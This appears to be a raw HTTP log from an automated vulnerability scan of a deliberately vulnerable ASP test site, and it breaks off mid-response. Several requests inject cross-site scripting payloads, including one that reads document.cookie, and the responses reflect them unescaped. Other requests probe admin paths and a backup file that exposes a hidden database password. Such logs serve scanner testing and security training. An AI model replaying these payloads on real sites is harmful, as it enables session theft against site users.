GET /join.asp?name=&email=>"><script>alert("XSS")</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:31 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc1
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:18 GMT X-Powered-By: ASP.NET Location: p1.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /linking/link1/link2/link3/link4/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:28 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc2
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:18 GMT X-Powered-By: ASP.NET Location: p2.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /login/login.asp?Action=Login&UserName=</textarea><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:53:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 363 Content-Type: text/html Cache-control: private <HTML> <HEAD> <BODY> <h1>Invalid username: </textarea><script>alert('XSS')</script></h1> <form action=login.asp method=get> Please login:<br> Username: <input type=text name=UserName><br> Password: <input type=password name=Password><br> <input type=submit value="Login"><br> <input type=hidden name=Action value="Login"><br> </form> </BODY></HTML>
GET /join.asp?name=&email=&surname=&house=test@<script>alert(document.cookie)</script>.com&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:37 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /admin/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:33 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /include/common.inc HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:02 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:00 GMT ETag: "be7c48f8a9dc11:8f6" Content-Length: 15 my include file
GET /_vti_log/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_log/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /pindex.asp.bak HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:34:52 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT ETag: "208026c0a8dc11:8f6" Content-Length: 2061 <html> <body> <!-- Hidden Reference comment: should find this file /test/hidden.txt --> This page allows for testing of pareters.<br> <br> The first section shows how a combo box can be used to product optional pages<br> <form action = pcomboindex.asp method=post> <SELECT name=cboPage> <OPTION selected value=pc1>Show Page One</OPTION> <option value=pc2>Show Page Two</option> <option value=pc3>Show page three</option> </select><br> <input type=submit value=Submit> </form><br> <hr> <a href="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</a><br> <br> <A href="error.html">My ERROR</A> Third example allows the user to input values and then shows them on the following page<br> <Form action="pformresults.asp" method=post> First Name: <input type=text name=txtFirstName><br> Last Name: <input type=text name=txtLastName><br> <input type=hidden name=txtHidden value="This was hidden from the user"> <input type=hidden name=dbConnectString value="dbCCNumbers;uid=sa;password=scoobydo"> <input type=submit value="Show User Input results"><br> </form><br> <hr> <form action="rootlogin.asp" method=post> User Name:<input type=text name=txtName><br> Pass phrase:<input type=text name=txtPassPhrase><br> <input type=submit value="Login"><br> </form> <br> False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <br> False Keyword that should not be flagged: An error has occurred <br> <br> <br> <A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A> <br> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A> <br> <A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A> <br> <A HREF="/linking/index.htm">Several chained directories</A> <br> <A HREF="/cfmerror.html">Cold Fusion Error</A> <br> <A HREF="/admin/help.cgi">Help</A> <br> <A HREF="/aspnet.aspx">ASP.NET file</A> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=1"style="background:url(javascript:alert('XSS'))"%20"&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:26 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home 